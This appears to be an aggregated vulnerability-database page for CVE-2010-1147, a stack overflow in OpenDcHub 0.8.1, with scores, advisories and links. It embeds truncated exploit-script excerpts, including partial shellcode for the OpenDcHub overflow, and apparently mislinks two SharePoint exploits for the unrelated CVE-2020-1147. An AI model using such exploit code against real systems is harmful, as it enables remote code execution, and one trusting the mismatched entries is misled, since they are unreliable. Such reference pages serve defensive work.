CVE-2010-1147
Published: 2010-04-06
Priority P3 · 41 · medium · 6 · CVSS 2.0
AV:N/AC:M/Au:S/C:P/I:P/A:P
EXPLOIT
EPSS: 8.17% (94.2th percentile)
Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0.8.1 allows remote authenticated users to execute arbitrary code via a long MyINFO message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| roshan_singh | open_direct_connect_hub | — | — |
CVSS provenance
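| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.0 | MEDIUM | AV:N/AC:M/Au:S/C:P/I:P/A:P |
| vendor_redhat | — | 6.0 | MEDIUM | — |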
Red Hat
v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
vendor_redhat·2010-03-31·CVSS 6.0
CVE-2010-1147 [MEDIUM] v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
GHSA
GHSA-rx3v-5h5h-c62c: Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0
ghsa_unreviewed·2022-05-02
CVE-2010-1147 [MEDIUM] CWE-119 GHSA-rx3v-5h5h-c62c: Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0
No detection rules found.
Exploit-DB
Microsoft SharePoint Server 2019 - Remote Code Execution (2)
exploitdb·2021-07-23·CVSS 7.8
CVE-2020-1147 [HIGH] Microsoft SharePoint Server 2019 - Remote Code Execution (2)
---
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from
Exploit-DB
Microsoft SharePoint Server 2019 - Remote Code Execution
exploitdb·2020-08-17·CVSS 7.8
CVE-2020-1147 [HIGH] Microsoft SharePoint Server 2019 - Remote Code Execution
---
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from requests
Exploit-DB
OpenDcHub 0.8.1 - Remote Code Execution
exploitdb·2010-03-31
CVE-2010-1147 OpenDcHub 0.8.1 - Remote Code Execution
---
#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
# OpenDcHub is a direct connect hub for Linux
#
# OpenDcHub doesn't handle specially crafted MyINFO messages, which leads to a stack overflow.
#
# Affected versions :
# OpenDcHub 0.8.1
#
# Platforms :
# Unix
#
# Usage :
# ./exploit.py
import socket
host = '192.168.1.9'
port = 5000
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24"
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d"
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75"
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308
http://lists.fedoraproject.org/pipermail/package-announce/2010-April/040360.html
http://lists.fedoraproject.org/pipermail/package-announce/2010-April/040380.html
http://lists.fedoraproject.org/pipermail/package-announce/2010-April/040421.html
http://marc.info/?l=oss-security&m=127051570728944&w=2
http://openwall.com/lists/oss-security/2010/04/03/1
http://secunia.com/advisories/39664
http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
http://www.securityfocus.com/archive/1/510428
http://www.securityfocus.com/bid/39129
http://www.vupen.com/english/advisories/2010/1023
http://www.vupen.com/english/advisories/2010/1044
https://bugzilla.redhat.com/show_bug.cgi?id=579206